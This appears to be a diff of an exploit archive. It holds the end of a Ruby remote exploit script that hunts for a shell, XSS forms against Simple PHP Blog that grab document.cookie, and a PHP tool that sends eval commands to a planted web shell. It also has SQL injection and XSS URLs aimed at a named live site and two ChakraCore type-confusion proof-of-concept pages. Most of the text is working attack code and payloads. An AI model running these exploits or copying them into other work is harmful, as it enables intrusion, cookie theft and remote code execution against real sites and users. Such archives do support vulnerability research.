+          # IT SHOULD NEVER HAPPEN
+          # But scream and continue just in case, it means there is a bug
+          puts "[-] Something went wrong. We can obtain the timestamp with the default credentials, but we could not execute code."
+          puts "[*] Let's try again..."
+          timestamp = get_auth_timestamp
+        end
+        next
+      end
+    rescue Net::ReadTimeout
+      # for bof case, we land here
+      got_shell
+    end
+  end
+  if timestamp == nil
+    start_time = end_time - (TIME_SURPLUS * 5)
+    end_time = end_time + (TIME_SURPLUS * 5)
+    puts "[*] Going for another round, increasing end time to #{end_time} and start time to #{start_time}"
+  end
+end
+
+# If we get here then the exploit failed
+puts "[-] Exploit finished. Failed to get a shell!"

platforms/cgi/webapps/26461.txt

@@ -14,7 +14,7 @@ document.forms[0].submit();
 </script>
 
 <form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post">
-<input name="blog_text" value='&lt;/textarea&gt;<script>alert(document.cookie)</script>'/>
+<input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
 <input type="submit"/>
 </form>
 

platforms/cgi/webapps/26462.txt

@@ -5,7 +5,7 @@ Simple PHP Blog is prone to multiple input validation vulnerabilities. These iss
 An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. 
 
 <form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
-<input name="blog_text" value='&lt;/textarea&gt;<script>alert(document.cookie)</script>'/>
+<input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
 <input type="submit"/>
 </form>
 

platforms/php/webapps/6311.php

@@ -27,7 +27,7 @@ extract($_POST);extract($_GET);
 print "<pre>URL:<form method=post><input size=80 name=url value=`$url`>";
 if (strlen($eval)>3){
    $eval=stripslashes($eval);
-   print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90>$eval&lt;/textarea&gt;";
+   print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90>$eval</textarea>";
    print "<input type=submit value='Eval'></form>";
    $res=curl("$url/images/emoticons/sphp.php","z=$eval");
    $res=strstr($res,"GIF89a");
@@ -76,7 +76,7 @@ if (strlen($url)>10)
   print "\n<hr>Trying to Logout...";flush();
   $res=curl($url."/logout.php","");
   if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n<h1>Error To Logout</h1>\n\n\n$res");
-  print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90>&lt;/textarea&gt;";
+  print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90></textarea>";
 }
 print "<input type=submit ></form>";
 ?>

platforms/php/webapps/6422.txt

@@ -45,12 +45,12 @@
   
      
      POC:  
-	http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 
+	http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 
 	http://www.site.com/search_results.php?query=[XSS] 
 
      
      Live Demo: 
-	http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
+	http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
 	http://www.phpvid.com/search_results.php?query=<script>alert(0);</script>
 
 

platforms/php/webapps/8713.txt

@@ -204,7 +204,7 @@ You must know that all _GET _POST _REQUEST variables are sanizated in init.inc.p
 File: /include/init.inc.php
 
 	// Do some cleanup in GET, POST and cookie data and un-register global vars
-	$HTML_SUBST = array('&' => '&amp;', '"' => '&quot;', '<' => '&lt;', '>' => '&gt;', '%26' => '&amp;', '%22' => '&quot;', '%3C' => '&lt;', '%3E' => '&gt;','%27' => '&#39;', "'" => '&#39;'); 
+	$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => '&#39;', "'" => '&#39;'); 
 
 	...
 	$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);

platforms/windows/dos/40947.html

@@ -0,0 +1,36 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=961
+
+The following code occurs in JavascriptSIMDObject::ToLocaleString in JavascriptSimdObject.cpp:
+
+        Var* newArgs = HeapNewArray(Var, numArgs);
+        switch (numArgs)
+        {
+        case 1:
+            break;
+        case 2:
+            newArgs[1] = args[1];
+            break;
+        case 3:
+            newArgs[1] = args[1];
+            newArgs[2] = args[2];
+            break;
+        default:
+            Assert(UNREACHED);
+        }
+
+If the call has more than three arguments, it will fall through, leaving newArgs uninitialized. This will cause toLocaleString to be called on uninitialized memory, having a similar effect to type confusion (as integers in the memory can be confused for pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached:
+
+    var v = SIMD.Int32x4(1, 2, 3, 4);
+    v.toLocaleString(1, 2, 3, 4)
+-->
+
+<html><body><script>
+    try{
+    var v = SIMD.Int32x4(1, 2, 3, 4);
+    alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
+	}catch(e){
+	alert(e.message);
+
+}
+</script></body></html>

platforms/windows/dos/40948.html

@@ -0,0 +1,64 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=972
+
+In Chakra, Internationlization is initialized the first time the Intl object is used, by executing the script in Intl.js (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/InJavascript/Intl.js). This code attempts to prevent Object methods from being redefined by user scripts, but there are a few stray calls to Object.defineProperty in initialization. If Object.defineProperty is redefined before Intl is initialized, a user-define method can be called during initialization. If this method defines a Collator (or DateTimeFormat or NumberFormat) getter and setter on the Intl object, it can intercept what it is set to, and set it to a different value instead. This will then cause type confusion in IntlEngineInterfaceExtensionObject::deletePrototypePropertyHelper (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/IntlEngineInterfaceExtensionObject.cpp), as this function assumes the properties of a Collator are objects, when they are not guaranteed to be. A minimal PoC is as follows, and a full PoC is attached.
+ 
+
+var d = Object.defineProperty;
+
+var noobj = {
+    get: function () {
+        return 0x1234567 >> 1;
+    },
+    set: function () {
+    }
+};
+
+function f(){
+	var i = Intl;
+	Intl  = {}; // this somehow prevents an exception that prevents laoding
+	d(i, "Collator", noobj);
+}
+
+
+Object.defineProperty = f;
+
+var q = new Intl.NumberFormat(["en"]);
+
+</script></body></html>
+-->
+
+<html><body><script>
+
+var d = Object.defineProperty;
+
+var noobj = {
+    get: function () {
+	print("in get no");
+        return 0x1234567 >> 1;
+    },
+    set: function () {
+        print("in set no");
+    }
+};
+
+function f(...a){
+	var i = Intl;
+	Intl  = {};
+	d(i, "Collator", noobj);
+	
+}
+
+var pattern = {
+    get: function () {
+        return f;
+    },
+    set: function () {
+    }
+};
+
+Object.defineProperty(Object, "defineProperty", pattern);
+
+var q = new Intl.NumberFormat(["en"]);
+
+</script></body></html>